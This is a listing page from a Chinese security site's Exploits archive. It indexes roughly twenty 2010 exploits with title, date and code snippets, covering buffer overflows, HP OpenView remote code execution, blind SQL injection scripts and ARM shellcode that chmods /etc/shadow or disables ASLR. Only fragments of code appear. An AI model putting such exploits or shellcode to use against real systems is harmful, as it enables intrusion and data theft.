首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
ISC-DHCPD Denial of Service
  日期:2010-07-05 11:10:07 点击:23 评论:0
#! /usr/bin/env python # Exploit title: isc-dhcpd DoS # Date: 03/07/2010 # Author: sid # Software Link: https://www.isc.org/software/dhcp # Version: 4.0.x, 4.1.x, 4.2.x # CVE: cve-2010-2156 # ps: is possible make a bruteforce on subnet ip address to
Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow PoC
  日期:2010-07-05 11:09:30 点击:17 评论:0
#!/usr/bin/perl # Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow POC # Author: v3n0m # Site: http://yogyacarderlink.web.id/ # Group: YOGYACARDERLINK # Date: July, 02-2010 [INDONESIA] # Software: Mp3 Digitalbox # Version: 2.7.2.0 Other versions m
HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
  日期:2010-07-05 11:08:57 点击:30 评论:0
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution # Date: 2010.07.02 # Author: S2 Crew [Hungary] # Software Link: hp.com # Version: 7.53 # Tested on: Windows 2003 # CVE: CVE-2010-1555 # Code : #!/usr/bin/pyth
HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution
  日期:2010-07-05 11:08:19 点击:31 评论:0
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution # Date: 2010.07.02 # Author: S2 Crew [Hungary] # Software Link: hp.com # Version: 7.53 # Tested on: Windows 2003 # CVE: CVE-2010-1554 # Code : #!/usr/bin/python
HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
  日期:2010-07-05 11:05:51 点击:40 评论:0
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution # Date: 2010.07.02 # Author: S2 Crew [Hungary] # Software Link: hp.com # Version: 7.53 # Tested on: Windows 2003 # CVE: CVE-2010-1553 # Code : #!/usr/bin/python
Mediacoder v0.7.3.4682 Universal Buffer Overflow (SEH)
  日期:2010-07-02 09:59:19 点击:97 评论:0
####################################################################Exploit Title : Mediacoder v0.7.3.4682 universal buffer overflow (SEH)#tested on windows xp SP 3 FR#download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.html#
Mini-Stream RM-MP3 Converter v3.1.2.1 .m3u Buffer Overflow
  日期:2010-07-02 09:56:36 点击:25 评论:0
#By Madjix Dz8[at]hotmail[dot]com #Greets: myself for find the bug :) # # Notes from EDB: # 000DBF98 41414141 AAAA # 000DBF9C 41414141 AAAA # 000DBFA0 41414141 AAAA # 000DBFA4 41414141 AAAA Pointer to next SEH record # 000DBFA8 41414141 AAAA SE hand
Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vuln
  日期:2010-07-02 09:55:36 点击:45 评论:0
Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability Intro: Due to hostility toward security researchers, the most recent example being of Tavis Ormandy, a number of us from the industry (and some not from the in
Mediacoder v0.7.3.4682 Universal Buffer Overflow (SEH)
  日期:2010-07-02 09:54:44 点击:80 评论:0
################################################################### #Exploit Title : Mediacoder v0.7.3.4682 universal buffer overflow (SEH) #tested on windows xp SP 3 FR #download : http://www.dodownload.com/video+multimedia/play+video/mediacoder.htm
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
  日期:2010-07-02 09:54:03 点击:34 评论:0
#!/usr/bin/perl #[0-Day] Oxygen2PHP = 1.1.3 (forumdisplay.php) Remote Blind SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes;
Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit
  日期:2010-07-02 09:53:05 点击:52 评论:0
#!/usr/bin/perl #[0-Day] Oxygen2PHP = 1.1.3 (post.php) Remote Blind SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; use IO:
RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)
  日期:2010-07-02 09:52:05 点击:38 评论:0
#!/usr/bin/perl # Exploit Title:RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass) # Date:July 1, 2010 # Author:Node # Software Link: http://www.mini-stream.net/downloads/RMDownloader.exe # Version:RM Downloader 3.1.3.3.2010.06.26 (Eval
Serenity Audio Player 3.2.3 (SEH) Buffer Overflow
  日期:2010-07-02 09:46:33 点击:33 评论:0
#Serenity Audio Player 3.2.3 (SEH) Buffer Overflow #Download : http://malsmith.kyabram.biz/serenity/serenity-3.2.3-win32-installer.exe #By Madjix Dz8[at]hotmail[dot]com my $hd= http:// ; my $jnk=x41 x 838 ; my $nops = x90 x 10 ; my $shellcode= xd
SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator
  日期:2010-07-01 10:24:44 点击:61 评论:0
############################################################################################################################################################## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ################################
Mini-Stream RM-MP3 Converter v3.1.2.1 Buffer Overflow Exploit (SEH)
  日期:2010-07-01 10:23:39 点击:93 评论:0
#http://www.mini-stream.net/downloads/Mini-streamRM-MP3Converter.exe#By Madjix Dz8[at]hotmail[dot]com#Greets: *Volc4n0 alone* :)my $shellcode= xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1 .x1ex58x31x78x18x83xe8xfcx03x78x68xf4
Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
  日期:2010-07-01 10:17:51 点击:81 评论:0
/* | Title: Linux/ARM - polymorphic chmod(/etc/shadow, 0777) - 84 Bytes | Type: Shellcode | Author: Florian Gaultier florian.gaultier@shell-storm.org | Platform: Linux ARM (ARM926EJ-S rev 5 (v51)) | [+] http://www.shell-storm.org */ #include stdio.h
Oxygen2PHP <= 1.1.3 (member.php) SQL Injection Exploit
  日期:2010-07-01 10:17:13 点击:31 评论:0
#!/usr/bin/perl #[0-Day] Oxygen2PHP = 1.1.3 (member.php) Remote SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use LWP::UserAgent; use HTTP::Cookies; use strict; my $UserName = shift or usage(); my $
Linux/ARM - Disable ASLR Security - 102 bytes
  日期:2010-07-01 10:16:19 点击:49 评论:0
/* Title: Linux/ARM - Disable ASLR Security - 102 bytes Date: 2010-06-20 Tested: Linux ARM9 2.6.28-6-versatile Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/shell_storm ! Database of shellcodes http://www.shell-storm.org/s
ShopCartDx <= v4.30 (products.php) Blind SQL Injection Exploit
  日期:2010-07-01 10:15:23 点击:32 评论:0
#!/usr/bin/perl #[0-Day] ShopCartDx = v4.30 (products.php) Remote Blind SQL Injection Exploit #Coded By Dante90, WaRWolFz Crew #Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; use
PHP-Nuke <= 8.0 Remote SQL Injection Ex
  日期:2010-07-01 10:10:11 点击:24 评论:0
#!/usr/bin/perl #[0-Day] PHP-Nuke = 8.0 (News) Remote SQL Injection Exploit #Created: 2010.04.23 after 3 days the bug was discovered. #Author/s: Dante90 The:Paradox, WaRWolFz Crew #Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZ
共637页/12733条记录 首页 上一页 [357] [358] [359] 360 [361] [362] [363] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved